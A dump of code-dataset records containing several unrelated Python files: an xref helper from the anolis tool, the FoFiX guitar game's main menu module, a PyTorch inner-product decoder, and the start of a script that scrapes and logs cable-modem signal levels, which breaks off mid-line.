SyntaxError(b'Term not defined: %s, %s.' % (term, element))\n\n return\n\n def getTerm(self, element, w3c_compat=False, w3c_compat_xref_normalization=False, **kwargs):\n if element.get(b'data-anolis-xref') is not None:\n term = element.get(b'data-anolis-xref')\n elif element.get(b'title') is not None:\n term = element.get(b'title')\n else:\n term = utils.textContent(element)\n term = term.strip(utils.spaceCharacters).lower()\n term = utils.spacesRegex.sub(b' ', term)\n if w3c_compat or w3c_compat_xref_normalization:\n term = non_alphanumeric_spaces.sub(b'', term)\n return term\n\n\nclass DuplicateDfnException(utils.AnolisException):\n \"\"\"Term already defined.\"\"\"\n\n\nclass XrefsFileNotCreatedYetException(utils.AnolisException):\n \"\"\"The argument to --dump-xrefs does not exist yet.\"\"\"","sub_path":"pycfiles/anomalous-0.0.16-py2.py3-none-any/xref.py","file_name":"xref.py","file_ext":"py","file_size_in_byte":6738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"37401320","text":"from __future__ import division\nimport traceback\n####################################################################\r\n# -*- coding: iso-8859-1 -*- #\r\n# #\r\n# Frets on Fire #\r\n# Copyright (C) 2006 Sami Kyöstilä #\r\n# 2008 myfingershurt #\r\n# 2008 Blazingamer #\r\n# 2008 evilynux #\r\n# #\r\n# This program is free software; you can redistribute it and/or #\r\n# modify it under the terms of the GNU General Public License #\r\n# as published by the Free Software Foundation; either version 2 #\r\n# of the License, or (at your option) any later version. #\r\n# #\r\n# This program is distributed in the hope that it will be useful, #\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of #\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #\r\n# GNU General Public License for more details. #\r\n# #\r\n# You should have received a copy of the GNU General Public License #\r\n# along with this program; if not, write to the Free Software #\r\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, #\r\n# MA 02110-1301, USA. #\r\n#####################################################################\r\n\r\nfrom builtins import str\nfrom builtins import range\nfrom past.utils import old_div\nfrom OpenGL.GL import *\r\nimport math\r\nfrom FakeNetworking import socket\r\n\r\nfrom View import BackgroundLayer\r\nfrom Menu import Menu\r\nfrom Lobby import Lobby\r\nfrom Svg import ImgDrawing\r\nfrom Language import _\r\nimport Dialogs\r\nimport Config\r\nimport Audio\r\nimport Settings\r\nimport datetime\r\nimport sys\r\nimport Theme\r\nimport Player\r\nimport Version\r\nfrom Shader import shaders\r\nimport sys\nimport os\r\n\r\n#myfingershurt: needed for random menu music:\r\nimport random\r\nimport string\r\n\r\nimport Log\r\n\r\nclass MainMenu(BackgroundLayer):\r\n def __init__(self, engine):\r\n self.engine = engine\r\n\r\n self.logClassInits = Config.get(\"game\", \"log_class_inits\")\r\n if self.logClassInits == 1:\r\n Log.debug(\"MainMenu class init (MainMenu.py)...\")\r\n\r\n self.time = 0.0\r\n self.nextLayer = None\r\n self.visibility = 0.0\r\n self.active = False\r\n Player.practiceMode = False \r\n\r\n #myfingershurt: removing neck menu requirement:\r\n #self.neckMenuEnabled = False\r\n \r\n #self.neckMenuEnabled = Config.get(\"game\", \"neck_select_enabled\")\r\n\r\n self.gfxVersionTag = Config.get(\"game\", \"gfx_version_tag\")\r\n\r\n #self.tut = Config.get(\"game\", \"tut\")\r\n self.updateNeck()\n dPlayerConfig = None\r\n #Get theme\r\n self.theme = self.engine.data.theme\r\n self.themeCoOp = self.engine.data.themeCoOp\r\n self.themename = self.engine.data.themeLabel\r\n self.useSoloMenu = Theme.use_solo_submenu\r\n \r\n allowMic = True\r\n \r\n if self.theme == 0:\r\n allowMic = False\r\n\r\n try:\r\n #blazingamer\r\n self.menux = Theme.menuX\r\n self.menuy = Theme.menuY\r\n except Exception as e:\r\n Log.warn(\"Unable to load Theme menuX / Y positions: %s\" % e) \r\n self.menux = None\r\n self.menuy = None\r\n\r\n self.rbmenu = Theme.menuRB\r\n \r\n #MFH\r\n self.main_menu_scale = Theme.main_menu_scaleVar\r\n self.main_menu_vspacing = Theme.main_menu_vspacingVar\r\n\r\n if self.main_menu_scale == None:\r\n self.main_menu_scale = .5\r\n if self.main_menu_vspacing == None:\r\n self.main_menu_vspacing = 0.09\r\n\r\n\r\n \r\n \r\n \r\n\r\n try:\r\n self.engine.loadImgDrawing(self, \"background\", os.path.join(\"themes\",self.themename,\"menu\",\"mainbg.png\"))\r\n except IOError:\r\n self.background = None\r\n self.engine.loadImgDrawing(self, \"BGText\", os.path.join(\"themes\",self.themename,\"menu\",\"maintext.png\"))\r\n try:\r\n self.engine.loadImgDrawing(self, \"optionsBG\", os.path.join(\"themes\",self.themename,\"menu\",\"optionsbg.png\"))\r\n except IOError:\r\n self.optionsBG = None\r\n self.engine.loadImgDrawing(self, \"optionsPanel\", os.path.join(\"themes\",self.themename,\"menu\",\"optionspanel.png\"))\r\n \r\n #racer: added version tag\r\n if self.gfxVersionTag or Theme.versiontag == True:\r\n try:\r\n self.engine.loadImgDrawing(self, \"version\", os.path.join(\"themes\",self.themename,\"menu\",\"versiontag.png\"))\r\n except IOError:\r\n try:\r\n self.engine.loadImgDrawing(self, \"version\", \"versiontag.png\") #falls back on default versiontag.png in data\\ folder\r\n except IOError:\r\n self.version = None\r\n else:\r\n self.version = None\r\n\r\n\r\n \r\n #myfingershurt: random main menu music function, menu.ogg and menuXX.ogg (any filename with \"menu\" as the first 4 letters)\r\n filepath = self.engine.getPath(os.path.join(\"themes\",self.themename,\"sounds\"))\r\n self.files = []\r\n allfiles = os.listdir(filepath)\r\n for name in allfiles:\r\n if os.path.splitext(name)[1] == \".ogg\":\r\n if name.find(\"menu\") > -1:\r\n self.files.append(name)\r\n \r\n\r\n if self.files:\r\n i = random.randint(0,len(self.files)-1)\r\n filename = self.files[i]\r\n sound = os.path.join(\"themes\",self.themename,\"sounds\",filename)\r\n self.menumusic = True\r\n engine.menuMusic = True\r\n\r\n self.song = Audio.Sound(self.engine.resource.fileName(sound))\r\n self.song.setVolume(self.engine.config.get(\"audio\", \"menu_volume\"))\r\n self.song.play() #no loop\r\n else:\r\n self.menumusic = False\r\n\r\n \r\n #####======= Racer: New Main Menu ======####\r\n\r\n self.opt_text_color = Theme.hexToColor(Theme.opt_text_colorVar)\r\n self.opt_selected_color = Theme.hexToColor(Theme.opt_selected_colorVar)\r\n\r\n if self.opt_text_color == None:\r\n self.opt_text_color = (1,1,1)\r\n if self.opt_selected_color == None:\r\n self.opt_selected_color = (1,0.75,0)\r\n\r\n\r\n newMultiplayerMenu = [\r\n (_(\"Host Multiplayer Game\"), self.hostMultiplayerGame),\r\n (_(\"Join Multiplayer Game\"), self.joinMultiplayerGame),\r\n ]\r\n \r\n editorMenu = Menu(self.engine, [\r\n (_(\"Edit Existing Song\"), self.startEditor),\r\n (_(\"Import New Song\"), self.startImporter),\r\n (_(\"Import GH(tm) Songs\"), self.startGHImporter),\r\n ])\r\n\r\n trainingMenu = [\r\n (_(\"Tutorials\"), self.showTutorial),\r\n (_(\"Practice\"), lambda: self.newLocalGame(mode1p = 1)),\r\n ]\r\n \r\n self.opt_bkg_size = [float(i) for i in Theme.opt_bkg_size]\r\n\r\n strCareer = \"\"\r\n strQuickplay = \"\"\r\n strSolo = \"\"\r\n strMultiplayer = \"\"\r\n strTraining = \"\"\r\n strSettings = \"\"\r\n strQuit = \"\"\r\n \r\n if self.theme == 1 and self.themeCoOp: #Worldrave - Put GH Co-op ahead of FoFix co-op for GH based theme's. Made more sense.\r\n multPlayerMenu = [\r\n (_(\"Face-Off\"), lambda: self.newLocalGame(players = 2, maxplayers = -1)),\r\n (_(\"Pro Face-Off\"), lambda: self.newLocalGame(players = 2, mode2p = 1, maxplayers = -1)),\r\n (_(\"GH Battle\"), lambda: self.newLocalGame(players = 2, mode2p = 6, maxplayers = -1, allowDrum = False)), #akedrou- so you can block drums\r\n (_(\"Party Mode\"), lambda: self.newLocalGame(mode2p = 2)),\r\n (_(\"Co-Op\"), lambda: self.newLocalGame(players = 2, mode2p = 5)),\r\n (_(\"FoFiX Co-Op\"), lambda: self.newLocalGame(players = 2, mode2p = 3, allowMic = allowMic)), #Worldrave - Re-added this option for now.\r\n ]\r\n elif self.theme == 1 and not self.themeCoOp:\r\n multPlayerMenu = [\r\n (_(\"Face-Off\"), lambda: self.newLocalGame(players = 2, maxplayers = -1)),\r\n (_(\"Pro Face-Off\"), lambda: self.newLocalGame(players = 2, mode2p = 1, maxplayers = -1)),\r\n (_(\"Party Mode\"), lambda: self.newLocalGame(mode2p = 2)),\r\n ]\r\n elif self.theme == 2:\r\n multPlayerMenu = [\r\n (_(\"FoFiX Co-Op\"), lambda: self.newLocalGame(players = 2, mode2p = 3, maxplayers = 4, allowMic = allowMic)),\r\n (_(\"RB Co-Op\"), lambda: self.newLocalGame(players = 2, mode2p = 4, maxplayers = 4, allowMic = allowMic)),\r\n (_(\"GH Co-Op\"), lambda: self.newLocalGame(players = 2, mode2p = 5, maxplayers = 4)),\r\n (_(\"Face-Off\"), lambda: self.newLocalGame(players = 2, maxplayers = -1)),\r\n (_(\"Pro Face-Off\"), lambda: self.newLocalGame(players = 2, mode2p = 1, maxplayers = -1)),\r\n (_(\"Party Mode\"), lambda: self.newLocalGame(mode2p = 2)),\r\n ]\r\n else:\r\n multPlayerMenu = [\r\n (_(\"FoFiX Co-Op\"), lambda: self.newLocalGame(players = 2, mode2p = 3, allowMic = allowMic)),\r\n (_(\"Face-Off\"), lambda: self.newLocalGame(players = 2, maxplayers = -1)),\r\n (_(\"Pro Face-Off\"), lambda: self.newLocalGame(players = 2, mode2p = 1, maxplayers = -1)),\r\n (_(\"Party Mode\"), lambda: self.newLocalGame(mode2p = 2)),\r\n ]\r\n \r\n if self.useSoloMenu is None:\r\n if self.theme == 0 or self.theme == 1: #GH themes = 6 main menu selections\r\n self.useSoloMenu = False\r\n else: #RB themes = 5 main menu selections\r\n self.useSoloMenu = True\r\n \r\n if not self.useSoloMenu:\r\n\r\n mainMenu = [\r\n (strCareer, lambda: self.newLocalGame(mode1p = 2, allowMic = allowMic)),\r\n (strQuickplay, lambda: self.newLocalGame(allowMic = allowMic)),\r\n ((strMultiplayer,\"multiplayer\"), multPlayerMenu),\r\n ((strTraining,\"training\"), trainingMenu),\r\n ((strSettings,\"settings\"), self.settingsMenu),\r\n (strQuit, self.quit),\r\n ]\r\n \r\n else:\r\n\r\n soloMenu = [\r\n (_(\"Solo Tour\"), lambda: self.newLocalGame(mode1p = 2, allowMic = allowMic)),\r\n (_(\"Quickplay\"), lambda: self.newLocalGame(allowMic = allowMic)),\r\n ]\r\n\r\n mainMenu = [\r\n #( ( _(strSolo), 1, (0,0) ), soloMenu),\r\n ((strSolo,\"solo\"), soloMenu),\r\n ((strMultiplayer,\"multiplayer\"), multPlayerMenu),\r\n ((strTraining,\"training\"), trainingMenu),\r\n ((strSettings,\"settings\"), self.settingsMenu),\r\n (strQuit, self.quit),\r\n ]\r\n\r\n\r\n \r\n self.menu = Menu(self.engine, mainMenu, onClose = lambda: self.engine.view.popLayer(self), pos = (12,12), textColor = self.opt_text_color, selectedColor = self.opt_selected_color)\r\n\r\n engine.mainMenu = self #Points engine.mainMenu to the one and only MainMenu object instance\r\n\r\n ## whether the main menu has come into view at least once\n self.shownOnce = False\n\n def updateNeck(self):\n engine = self.engine\n self.chosenNeck = Config.get(\"game\", \"default_neck\")\r\n exists = 0\r\n #neck fallback to random if doesn't exist.\r\n try:\r\n # evilynux - first assume the chosenNeck contains the full filename\r\n engine.loadImgDrawing(self, \"ok\", os.path.join(\"necks\",self.chosenNeck+\".png\"))\r\n except IOError:\r\n try:\r\n engine.loadImgDrawing(self, \"ok\", os.path.join(\"necks\",\"Neck_\"+self.chosenNeck+\".png\"))\r\n except IOError:\r\n pass\r\n else:\r\n exists = 1\r\n else:\r\n exists = 1\r\n #MFH - fallback logic now supports a couple valid default neck filenames\r\n #MFH - check for Neck_1\r\n if exists == 0:\r\n try:\r\n engine.loadImgDrawing(self, \"ok\", os.path.join(\"necks\",\"Neck_1.png\"))\r\n except IOError:\r\n pass\r\n else:\r\n Config.set(\"game\", \"default_neck\", \"1\")\r\n Log.warn(\"Default chosen neck not valid; fallback Neck_1.png forced.\")\r\n exists = 1\r\n #MFH - check for defaultneck\r\n if exists == 0:\r\n try:\r\n engine.loadImgDrawing(self, \"ok\", os.path.join(\"necks\",\"defaultneck.png\"))\r\n except IOError: #we don't really need to be accepting this except... ...yea, sorry.\r\n raise IOError(\"Default chosen neck not valid; fallbacks Neck_1.png and defaultneck.png also not valid!\")\r\n else:\r\n Log.warn(\"Default chosen neck not valid; fallback defaultneck.png forced.\")\r\n Config.set(\"game\", \"default_neck\", \"defaultneck\")\r\n\n def settingsMenu(self):\r\n if self.engine.advSettings:\r\n self.settingsMenuObject = Settings.SettingsMenu(self.engine)\r\n else:\r\n self.settingsMenuObject = Settings.BasicSettingsMenu(self.engine)\r\n return self.settingsMenuObject\r\n\r\n def shown(self):\r\n self.engine.view.pushLayer(self.menu)\r\n self.engine.stopServer()\r\n shaders.checkIfEnabled()\r\n if not self.shownOnce:\n self.shownOnce = True\n if hasattr(sys, 'frozen'):\n #stump: Check whether this is a non-svn binary being run from an svn working copy.\n if os.path.isdir(os.path.join('src', '.svn')) and 'development' not in Version.version():\n Dialogs.showMessage(self.engine, _('This binary release is being run from a Subversion working copy. This is not the correct way to run FoFiX from Subversion. Please see one of the following web pages to set your Subversion working copy up correctly:') +\n '\\n\\nhttp://code.google.com/p/fofix/wiki/RunningUnderPython26' +\n '\\nhttp://code.google.com/p/fofix/wiki/RequiredSourceModules')\n #stump: Check whether this is an svn binary not being run from an svn working copy\n elif not os.path.isdir(os.path.join('src', '.svn')) and 'development' in Version.version():\n Dialogs.showMessage(self.engine, _('This binary was built from a Subversion working copy but is not running from one. The FoFiX Team will not provide any support whatsoever for this binary. Please see the following site for official binary releases:') +\n '\\n\\nhttp://code.google.com/p/fofix/')\n\n def runMusic(self):\r\n if not self.song.isPlaying(): #re-randomize\r\n if self.files:\r\n i = random.randint(0,len(self.files)-1)\r\n filename = self.files[i]\r\n sound = os.path.join(\"themes\",self.themename,\"sounds\",filename)\r\n self.menumusic = True\r\n self.engine.menuMusic = True\r\n \r\n #self.song = Audio.Sound(self.engine.resource.fileName(sound))\r\n self.song = Audio.Sound(self.engine.resource.fileName(sound))\r\n self.song.setVolume(self.engine.config.get(\"audio\", \"menu_volume\"))\r\n #self.song.play(-1)\r\n self.song.play() #no loop\r\n else:\r\n self.menumusic = False\r\n self.engine.menuMusic = False\r\n \r\n def setMenuVolume(self):\r\n if self.menumusic and self.song.isPlaying():\r\n self.song.setVolume(self.engine.config.get(\"audio\", \"menu_volume\"))\r\n \r\n def cutMusic(self):\r\n if self.menumusic:\r\n if self.song and not self.engine.menuMusic:\r\n self.song.fadeout(1400)\r\n \r\n def hidden(self):\r\n self.engine.view.popLayer(self.menu)\r\n self.cutMusic()\r\n if self.nextLayer:\r\n self.engine.view.pushLayer(self.nextLayer())\r\n self.nextLayer = None\r\n else:\r\n self.engine.quit()\r\n\r\n def quit(self):\r\n self.engine.view.popLayer(self.menu)\r\n\r\n def catchErrors(function):\r\n def harness(self, *args, **kwargs):\r\n try:\r\n try:\r\n function(self, *args, **kwargs)\r\n except:\r\n import traceback\r\n Log.error(\"Traceback:\" + traceback.format_exc() )\r\n traceback.print_exc()\r\n raise\r\n except socket.error as e:\r\n Dialogs.showMessage(self.engine, str(e[1]))\r\n except KeyboardInterrupt:\r\n pass\r\n except Exception as e:\r\n #MFH - enhancing error trapping and locating logic\r\n if e:\r\n Dialogs.showMessage(self.engine, str(e))\r\n return harness\r\n\r\n def launchLayer(self, layerFunc):\r\n if not self.nextLayer:\r\n self.nextLayer = layerFunc\r\n self.engine.view.popAllLayers()\r\n #launchLayer = catchErrors(launchLayer) #MFH - trying to catch errors\r\n\r\n def showTutorial(self):\r\n # evilynux - Make sure tutorial exists before launching\r\n #tutorialpath = self.engine.getPath(os.path.join(\"songs\",\"tutorial\"))\r\n tutorialpath = self.engine.tutorialFolder\r\n if not os.path.isdir(self.engine.resource.fileName(tutorialpath)):\r\n Log.debug(\"No folder found: %s\" % tutorialpath)\r\n Dialogs.showMessage(self.engine, _(\"No tutorials found!\"))\r\n return\r\n\r\n if self.engine.isServerRunning():\r\n return\r\n\r\n players = Dialogs.activateControllers(self.engine, 1) #akedrou\r\n if players == 0:\r\n return\r\n \r\n Config.set(\"game\",\"game_mode\", 0) #MFH - ensure tutorial can work with new logic that depends on this mode variable\r\n Config.set(\"game\",\"multiplayer_mode\", 0) #MFH - ensure tutorial can work with new logic that depends on this mode variable\r\n Config.set(\"game\", \"players\", 1)\r\n Config.set(\"game\", \"tut\", True)\r\n \r\n #Config.set(\"game\",\"game_mode\", 1) #MFH - don't force practice mode.... this is problematic.\r\n\r\n self.engine.startServer()\r\n self.engine.resource.load(self, \"session\", lambda: self.engine.connect(\"127.0.0.1\"), synch = True)\r\n\r\n if Dialogs.showLoadingScreen(self.engine, lambda: self.session and self.session.isConnected):\r\n self.launchLayer(lambda: Lobby(self.engine, self.session, singlePlayer = True))\r\n showTutorial = catchErrors(showTutorial)\r\n\r\n #MFH: adding deprecated support for EOF's method of quickstarting a song to test it\r\n def newSinglePlayerGame(self):\r\n self.newLocalGame() #just call start function with default settings = 1p quickplay\r\n \r\n def newLocalGame(self, players=1, mode1p=0, mode2p=0, maxplayers = None, allowGuitar = True, allowDrum = True, allowMic = False): #mode1p=0(quickplay),1(practice),2(career) / mode2p=0(faceoff),1(profaceoff)\r\n self.engine.data.acceptSound.play()\r\n players = Dialogs.activateControllers(self.engine, players, maxplayers, allowGuitar, allowDrum, allowMic) #akedrou\r\n if players == 0:\r\n if self.engine.cmdPlay == 2:\r\n self.engine.cmdPlay = 0\r\n return\r\n Config.set(\"game\", \"players\", players)\r\n Config.set(\"game\",\"game_mode\", mode1p)\r\n Config.set(\"game\",\"multiplayer_mode\", mode2p)\r\n if Config.get(\"game\", \"tut\") == True:\r\n Config.set(\"game\", \"tut\", False)\r\n #Config.set(\"game\", \"selected_library\", \"\")\r\n #Config.set(\"game\", \"selected_song\", \"\")\r\n\r\n #MFH - testing new traceback logging:\r\n #raise TypeError\r\n\r\n if self.engine.isServerRunning():\r\n return\r\n self.engine.startServer()\r\n self.engine.resource.load(self, \"session\", lambda: self.engine.connect(\"127.0.0.1\"), synch = True)\r\n \r\n if Dialogs.showLoadingScreen(self.engine, lambda: self.session and self.session.isConnected):\r\n self.launchLayer(lambda: Lobby(self.engine, self.session, singlePlayer = True))\r\n newLocalGame = catchErrors(newLocalGame)\r\n\r\n def hostMultiplayerGame(self):\r\n self.engine.startServer()\r\n self.engine.resource.load(self, \"session\", lambda: self.engine.connect(\"127.0.0.1\"))\r\n\r\n if Dialogs.showLoadingScreen(self.engine, lambda: self.session and self.session.isConnected):\r\n self.launchLayer(lambda: Lobby(self.engine, self.session))\r\n hostMultiplayerGame = catchErrors(hostMultiplayerGame)\r\n\r\n def joinMultiplayerGame(self, address = None):\r\n if not address:\r\n address = Dialogs.getText(self.engine, _(\"Enter the server address:\"), \"127.0.0.1\")\r\n\r\n if not address:\r\n return\r\n \r\n self.engine.resource.load(self, \"session\", lambda: self.engine.connect(address))\r\n\r\n if Dialogs.showLoadingScreen(self.engine, lambda: self.session and self.session.isConnected, text = _(\"Connecting...\")):\r\n self.launchLayer(lambda: Lobby(self.engine, self.session))\r\n joinMultiplayerGame = catchErrors(joinMultiplayerGame)\r\n\r\n def startEditor(self):\r\n self.launchLayer(lambda: Editor(self.engine))\r\n startEditor = catchErrors(startEditor)\r\n\r\n def startImporter(self):\r\n self.launchLayer(lambda: Importer(self.engine))\r\n startImporter = catchErrors(startImporter)\r\n\r\n def startGHImporter(self):\r\n self.launchLayer(lambda: GHImporter(self.engine))\r\n startGHImporter = catchErrors(startGHImporter)\r\n \r\n def run(self, ticks):\r\n self.time += ticks / 50.0\r\n if self.engine.cmdPlay == 1:\r\n self.engine.cmdPlay = 4\r\n elif self.engine.cmdPlay == 4: #this frame runs the engine an extra loop to allow the font to load...\r\n #evilynux - improve cmdline support\r\n self.engine.cmdPlay = 2\r\n self.newLocalGame(players = Config.get(\"game\", \"players\"), mode1p = Config.get(\"game\",\"game_mode\"), mode2p = Config.get(\"game\",\"multiplayer_mode\"))\r\n elif self.engine.cmdPlay == 3:\r\n self.quit()\r\n \r\n \r\n if self.menumusic: #MFH \r\n self.runMusic()\r\n \r\n \r\n def render(self, visibility, topMost):\r\n self.engine.view.setViewport(1,0)\r\n self.visibility = visibility\r\n if self.rbmenu:\r\n v = 1.0 - ((1 - visibility) ** 2)\r\n else:\r\n v = 1\r\n if v == 1:\r\n self.engine.view.transitionTime = 1 \r\n\r\n if self.menu.active and not self.active:\r\n self.active = True\r\n\r\n \r\n t = old_div(self.time, 100)\r\n w, h, = self.engine.view.geometry[2:4]\r\n r = .5\r\n \r\n if not self.useSoloMenu:\r\n\r\n if self.active:\r\n if self.engine.view.topLayer() is not None:\r\n if self.optionsBG != None:\r\n self.engine.drawImage(self.optionsBG, (self.opt_bkg_size[2],-self.opt_bkg_size[3]), (w*self.opt_bkg_size[0],h*self.opt_bkg_size[1]), stretched = 3)\r\n \r\n self.engine.drawImage(self.optionsPanel, (0.5,-0.5), (w/1.7, old_div(h,2)))\r\n else:\r\n self.engine.drawImage(self.engine.data.loadingImage, (1.0,-1.0), (old_div(w,2), old_div(h,2)), stretched = 3)\r\n\r\n if self.menu.active and self.engine.cmdPlay == 0:\r\n if self.background != None:\r\n #MFH - auto-scaling\r\n self.engine.drawImage(self.background, (1.0,-1.0), (old_div(w,2), old_div(h,2)), stretched = 3)\r\n\r\n for i in range(0,6):\r\n #Item selected\r\n if self.menu.currentIndex == i:\r\n xpos = (.5,1)\r\n #Item unselected\r\n else:\r\n xpos = (0,.5)\r\n #which item?\r\n ypos = 1/6.0*i\r\n\r\n\r\n#============blazingamer============\r\n#if menux and/or menuy are not set it will use the default positions for the main text\r\n if self.menux == None or self.menuy == None:\r\n if self.theme == 0:\r\n textcoord = (w*0.5,h*0.45-(h*self.main_menu_vspacing)*i)\r\n elif self.theme == 1:\r\n textcoord = (w*0.7,h*0.8-(h*self.main_menu_vspacing)*i)\r\n#if menux and menuy are set it will use those\r\n else:\r\n try:\r\n textcoord = (w*self.menux,h*self.menuy-(h*self.main_menu_vspacing)*i)\r\n except Exception as e:\r\n Log.warn(\"Unable to translate BGText: %s\" % e) \r\n \r\n#=================================== \r\n\r\n self.engine.drawImage(self.BGText, (.5*self.main_menu_scale,-1/6.0*self.main_menu_scale), textcoord,\r\n rect = (xpos[0],xpos[1],ypos,ypos+1/6.0))\r\n\r\n else:\r\n\r\n if self.active:\r\n if self.engine.view.topLayer() is not None:\r\n if self.optionsBG != None:\r\n self.engine.drawImage(self.optionsBG, (self.opt_bkg_size[2],-self.opt_bkg_size[3]), (w*self.opt_bkg_size[0],h*self.opt_bkg_size[1]), stretched = 3)\r\n \r\n self.engine.drawImage(self.optionsPanel, (0.5,-0.5), (w*0.4, old_div(h,2)))\r\n else:\r\n self.engine.drawImage(self.engine.data.loadingImage, scale = (1.0,-1.0), coord = (old_div(w,2),old_div(h,2)), stretched = 3)\r\n \r\n if self.menu.active and self.engine.cmdPlay == 0:\r\n if self.background != None:\r\n self.engine.drawImage(self.background, (1.0,-1.0), (old_div(w,2), old_div(h,2)), stretched = 3)\r\n\r\n for i in range(0,5):\r\n #Item selected\r\n if self.menu.currentIndex == i:\r\n xpos = (.5,1)\r\n #Item unselected\r\n else:\r\n xpos = (0,.5)\r\n #which item?\r\n ypos = 1/5.0*i\r\n \r\n\r\n#============blazingamer============\r\n#if menux and/or menuy are not set it will use the default positions for the main text\r\n if self.menux == None or self.menuy == None:\r\n textcoord = (w*0.2,(h*0.8-(h*self.main_menu_vspacing)*i)*v)\r\n#if menux and menuy are set it will use those\r\n else:\r\n try:\r\n textcoord = (w*self.menux,(h*self.menuy-(h*self.main_menu_vspacing)*i)*v)\r\n except Exception as e:\r\n Log.warn(\"Unable to translate BGText: %s\" % e) \r\n \r\n#===================================\r\n\r\n self.engine.drawImage(self.BGText, (.5*self.main_menu_scale,(-1/5.0*self.main_menu_scale)),\r\n textcoord, rect = (xpos[0],xpos[1],ypos,ypos+1/5.0))\r\n\r\n#racer: added version tag to main menu:\r\n if self.version != None:\r\n wfactor = self.version.widthf(pixelw = 640.000)\r\n self.engine.drawImage(self.version, (0.5,-0.5),(w*Theme.versiontagposX, h*Theme.versiontagposY)) #worldrave - Added theme settings to control X+Y positions of versiontag.\r\n\r\n\r\n","sub_path":"MainMenu.py","file_name":"MainMenu.py","file_ext":"py","file_size_in_byte":25352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"418129870","text":"# !/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# author: chinshin\r\n# datetime: 2020/4/20 15:50\r\nimport torch\r\nimport torch.nn as nn\r\n\r\n\r\nclass InnerProductDecoder(nn.Module):\r\n def __init__(self, input_dim: int, dropout: float = 0.0):\r\n super(InnerProductDecoder, self).__init__()\r\n self.dropout = nn.Dropout(dropout)\r\n self.act = torch.sigmoid\r\n self.criterion = nn.MSELoss()\r\n\r\n def forward(self, inputs: torch.Tensor) -> torch.Tensor:\r\n \"\"\"\r\n :param inputs: (batch_size, seq_len, hidden_size)\r\n :return: (seq_len * seq_len, )\r\n \"\"\"\r\n # temp_mask = (targets > 0).unsqueeze(1).repeat(1, targets.size(1), 1)\r\n # temp_mask_t = temp_mask.transpose(1, 2)\r\n # mask = temp_mask * temp_mask_t\r\n # lengths = [torch.sum(sub_mask[0]).item() for sub_mask in mask]\r\n inputs_row = inputs\r\n inputs_col = inputs.transpose(1, 2)\r\n inputs_row = self.dropout(inputs_row)\r\n inputs_col = self.dropout(inputs_col)\r\n rec = torch.bmm(inputs_row, inputs_col)\r\n outputs = self.act(rec)\r\n outputs = outputs.view(-1)\r\n return outputs\r\n # new_rec = []\r\n # new_targets = []\r\n # for length, single_rec, single_adj in zip(lengths, rec, adj):\r\n # new_rec.extend(single_rec[:length, :length].reshape(length * length, ))\r\n # new_targets.extend(single_adj[:length, :length].reshape(length * length, ))\r\n # new_rec = torch.tensor(new_rec)\r\n # new_targets = torch.tensor(new_targets)\r\n # new_rec = self.act(new_rec)\r\n # dec_loss = self.criterion(new_rec, new_targets)\r\n # return dec_loss","sub_path":"bert/model/decoder/inner_product.py","file_name":"inner_product.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"284517656","text":"import re, itertools, urllib.request, datetime\nfrom bs4 import BeautifulSoup\n\n## set modem's IP Address\nip = 'http://192.168.100.1/cmSignalData.htm'\n\ndate = ('Data logged: {:%Y-%b-%d %H:%M:%S}'.format(datetime.datetime.now()))\n\n## adjust signal level tolerance - if not high set to 100\n\ndownstream_high = 15\ndownstream_low = -15\nupstream_high = 55\nupstream_low = 37\nsnr_high = 100\nsnr_low = 30\n\nclass Scraper:\n\n def set_data(target, start):\n for data in td[start:]:\n rawData = data.string\n finishedData = int(re.sub(\"[^-?\\d+(\\.\\d+)?$]\", \"\", rawData))\n target.append(finishedData)\n\n def get_average(data):\n average = sum(data[1:]) / len(data)\n return average\n\n def check_limits(results, high, low, target):\n for result in results[1:]:\n if result <= low:\n target.append(results[0] + ' ' + str(result) + ' dBmV -- WARNING TOO LOW MINIMUM LEVEL: ' + str(low))\n elif result >= high:\n target.append(results[0] + ' ' + str(result) + ' dB -- WARNING TOO HIGH MAXIMUM LEVEL: ' + str(high))\n else:\n target.append(results[0] + ' ' + str(result) + ' DBmV -- in spec')\n\n def get_errors(unerrored, uncorrected, corrected, store):\n percentage = unerrored / (unerrored + uncorrected + corrected)\n percentage = percentage * 100\n errors.append(str(percentage) + ' % Unerrored Codewords')\n\n def write_to_log(entries, title):\n with open(\"modem.log\", \"a\") as f:\n title = title\n f.write('-- ' + title + ' --\\n')\n for entry in entries:\n f.write('Channel ' + str(entry[1]) + ' : ' + str(entry[0]) + '\\n')\n f.write('--------------------------------------------\\n')\n\n\n\ntry:\n with urllib.request.urlopen(ip) as f:\n\n soup = BeautifulSoup(f, 'html.parser')\n tables = soup.findAll('table')\n\n snr = ['Signal to Noise Ratio']\n downstream = ['Downstream Signal']\n upstream = ['Upstream Signal']\n up_channels = ['Upstream Channel']\n down_channels = ['Downstream Channel']\n unerrored = ['Unerrored Codewords']\n correctable = ['Corrected']\n uncorrectable = ['Uncorrected']\n\n down = []\n up = []\n noise = []\n\n scraper = Scraper\n\n for table in tables:\n rows = table.findAll('tr')\n for tr in rows:\n td = tr.findAll('td')\n for data in td:\n check = data.string\n\n if check == 'Signal to Noise Ratio':\n scraper.set_data(snr, 1)\n\n elif data.has_attr('align'):\n scraper.set_data(downstream, 2)\n\n elif check == 'Power Level':\n scraper.set_data(upstream, 1)\n\n elif check == 'Channel ID':\n if len(td) == 9:\n if len(down_channels) < 5:\n scraper.set_data(down_channels, 1)\n print(down_channels)\n elif len(td) == 5:\n scraper.set_data(up_channels, 1)\n\n elif check == 'Total Unerrored Codewords':\n scraper.set_data(unerrored, 2)\n\n elif check == 'Total Correctable Codewords':\n scraper.set_data(correctable, 2)\n\n elif check == 'Total Uncorrectable Codewords':\n scraper.set_data(uncorrectable, 2)\n\n\n ##Check results are within specs then write to .log\n with open(\"modem.log\", \"a\") as f:\n f.write('--------------------------------------------\\n')\n f.write('--------------------------------------------\\n')\n f.write('-- ' + date + ' --\\n')\n f.write('--------------------------------------------\\n')\n f.write('--------------------------------------------\\n')\n\n scraper.check_limits(downstream, downstream_high, downstream_low, 